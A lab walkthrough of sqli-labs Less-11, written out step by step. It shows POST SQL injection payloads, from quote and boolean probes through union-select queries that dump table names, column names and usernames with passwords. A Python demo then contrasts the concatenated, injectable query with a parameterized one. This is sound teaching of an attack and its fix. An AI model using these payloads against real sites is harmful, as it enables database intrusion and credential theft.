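sqli-labs less11 POST injection
Injection tool: Burp
(1) Determine the injection type:
Capture the request with Burp; with admin passed as the parameter, the page displays normally: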
and 1 = 1
Abnormal response, so it is probably not numeric injection.
Try a single quote:
It returns an error, a good sign.
and 1=1 --+
and 1 = 2 --+
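From this, the closing character for this string-type injection is determined to be '
(2) Determine the number of columns:
order by 1 displays normally
order by 2 displays normally
order by 3 returns an error
So the number of columns is 2.
(3) Determine the echo positions:
Clearly, both positions are echoed back.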
(4) Extract the database name:
uname=-1 ' union select 1,database() --+ &passwd=admin&submit=Submit
Database name: security
(5) Table names:
uname=-1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit
Table names:
emails,referers,uagents,users
(6) Pick the users table to query:
uname=-1 ' union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users' --+ &passwd=admin&submit=Submit
Columns found:
id,username,password
(7) Extract the data:
uname=-1 ' union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit
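Why the step (1) probes behave as they do, and what the fix looks like, as an added example that is not part of the original post or the sqli-labs source. It assumes the login query pastes the POST fields inside single quotes and returns two columns; an in-memory SQLite database with constructed rows stands in for the lab's MySQL.

```python
import sqlite3

def make_db():
    """In-memory SQLite stand-in for the lab's users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "alice-pw"), (2, "admin", "admin-pw")])
    return db

def login_concat(db, uname, passwd):
    """Assumed shape of the vulnerable query: POST fields pasted inside '...'."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' AND password='{passwd}' LIMIT 1")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # The lab page echoes the database error; here it is returned as text.
        return f"SQL error: {exc}"

def login_bound(db, uname, passwd):
    """Hardened form: values are bound as data and never parsed as SQL text."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    return db.execute(sql, (uname, passwd)).fetchall()

# Step (1) probes from the walkthrough; '+' in a POST body decodes to a space.
PROBES = ["admin", "admin'", "admin' and 1=1 -- ", "admin' and 1=2 -- "]

def compare(passwd="admin-pw"):
    """Run every probe through both query styles: probe -> (concat, bound)."""
    db = make_db()
    return {p: (login_concat(db, p, passwd), login_bound(db, p, passwd))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (concat, bound) in compare().items():
        print(f"{probe!r:24} concat={concat!r}  bound={bound!r}")
```

With bound parameters the quote, the boolean test and the comment marker are all compared as a literal username, so the error and the 1=1 / 1=2 difference that identify the closing character disappear.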